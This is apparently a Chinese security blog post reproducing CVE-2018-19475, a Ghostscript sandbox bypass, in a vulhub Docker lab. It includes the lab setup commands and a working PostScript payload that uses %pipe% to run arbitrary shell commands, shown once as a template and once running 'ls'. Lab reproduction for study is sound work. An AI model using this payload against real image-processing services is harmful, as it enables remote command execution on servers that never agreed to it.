博主介绍
博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
点赞➕评论➕收藏 == 养成习惯(一键三连)
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限,欢迎各位大佬指点,相互学习进步!
CVE-2018-19475
Ghostscript 9.26之前版本
Ghostscript 是一套基于 Adobe、PostScript 及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。Ghostscript 可以查看及打印 PS、EPS、PDF 文件,支持 PS 的绘图程序一般都很大。以Postscript和PDF阅览器使用的栅格化影像处理器RIP引擎,GhostScript 被许多图片处理库所使用。在文件上传过程中,有可能会用GhostScript来处理图片。
CVE-2018-19475是CVE-2018-16509的变体,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。
cd vulhub/ghostscript/CVE-2018-19475
docker-compose up -d
docker-compose ps
访问ip+端口
http://192.168.233.128:8080/
cat README.md
复现完记得关闭环境
docker-compose down
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%命令 > /tmp/success && cat /tmp/success) (w) file
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%ls > /tmp/success && cat /tmp/success) (w) file
回显出ls信息,命令执行成功。
1、docker 搭建 vulhub 靶场环境
2、[ vulhub漏洞复现篇 ] vulhub 漏洞集合 - 表格版本(含漏洞复现文章连接)
3、[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)